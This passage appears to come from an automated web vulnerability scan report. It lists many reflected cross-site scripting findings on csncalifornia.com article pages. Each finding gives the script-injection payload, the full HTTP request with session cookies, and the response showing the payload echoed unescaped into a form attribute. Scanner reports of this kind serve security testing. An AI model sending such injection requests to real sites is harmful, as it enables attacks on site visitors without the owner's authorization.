Path:   /12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8532"><script>alert(1)</script>31424100d05 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Steinmetz-NBA-Power-Rankings-121710e8532"><script>alert(1)</script>31424100d05/landing_steinmetz_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Steinmetz-NBA-Power-Rankings-121710e8532"><script>alert(1)</script>31424100d05/landing_steinmetz_v3.html">
...[SNIP]...

2.273. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b73b"><script>alert(1)</script>ff256d6f68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /123b73b"><script>alert(1)</script>ff256d6f68f/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/123b73b"><script>alert(1)</script>ff256d6f68f/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.274. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf117"><script>alert(1)</script>047b6a36e86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17bf117"><script>alert(1)</script>047b6a36e86/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17bf117"><script>alert(1)</script>047b6a36e86/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.275. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f29e"><script>alert(1)</script>b330f4234e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/102f29e"><script>alert(1)</script>b330f4234e6/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/102f29e"><script>alert(1)</script>b330f4234e6/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.276. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 306bd"><script>alert(1)</script>01f90018906 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Urban-Renterias-comments-wrong-in-every-306bd"><script>alert(1)</script>01f90018906/landing_urban_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-306bd"><script>alert(1)</script>01f90018906/landing_urban_v3.html">
...[SNIP]...

2.277. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed6b"><script>alert(1)</script>eaf8fc9806a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12aed6b"><script>alert(1)</script>eaf8fc9806a/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12aed6b"><script>alert(1)</script>eaf8fc9806a/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html">
...[SNIP]...

2.278. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7208f"><script>alert(1)</script>e6c3848c98e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/177208f"><script>alert(1)</script>e6c3848c98e/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36704

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/177208f"><script>alert(1)</script>e6c3848c98e/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html">
...[SNIP]...

2.279. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f885"><script>alert(1)</script>01099a9e493 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/108f885"><script>alert(1)</script>01099a9e493/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36704

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/108f885"><script>alert(1)</script>01099a9e493/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html">
...[SNIP]...

2.280. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><script>alert(1)</script>780f195bb47 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-70abd"><script>alert(1)</script>780f195bb47/landing_notes_notables.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36704

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-70abd"><script>alert(1)</script>780f195bb47/landing_notes_notables.html">
...[SNIP]...

2.281. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48591"><script>alert(1)</script>c1ce73c4869 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1248591"><script>alert(1)</script>c1ce73c4869/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1248591"><script>alert(1)</script>c1ce73c4869/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html">
...[SNIP]...

2.282. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c69"><script>alert(1)</script>a38fb92e8ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1762c69"><script>alert(1)</script>a38fb92e8ce/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1762c69"><script>alert(1)</script>a38fb92e8ce/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html">
...[SNIP]...

2.283. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89a75"><script>alert(1)</script>3146e5a4d51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/1089a75"><script>alert(1)</script>3146e5a4d51/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/1089a75"><script>alert(1)</script>3146e5a4d51/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html">
...[SNIP]...

2.284. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea62d"><script>alert(1)</script>4f49a2ea5c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imaea62d"><script>alert(1)</script>4f49a2ea5c9/landing_kings.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imaea62d"><script>alert(1)</script>4f49a2ea5c9/landing_kings.html">
...[SNIP]...

2.285. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b448"><script>alert(1)</script>5900ac44632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html?5b448"><script>alert(1)</script>5900ac44632=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="5b448"><script>alert(1)</script>5900ac44632" id = "5b448">
...[SNIP]...

2.286. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e362b"><script>alert(1)</script>0a797a8bec4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12e362b"><script>alert(1)</script>0a797a8bec4/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12e362b"><script>alert(1)</script>0a797a8bec4/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html">
...[SNIP]...

2.287. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c56c"><script>alert(1)</script>220a7b4481e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/177c56c"><script>alert(1)</script>220a7b4481e/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
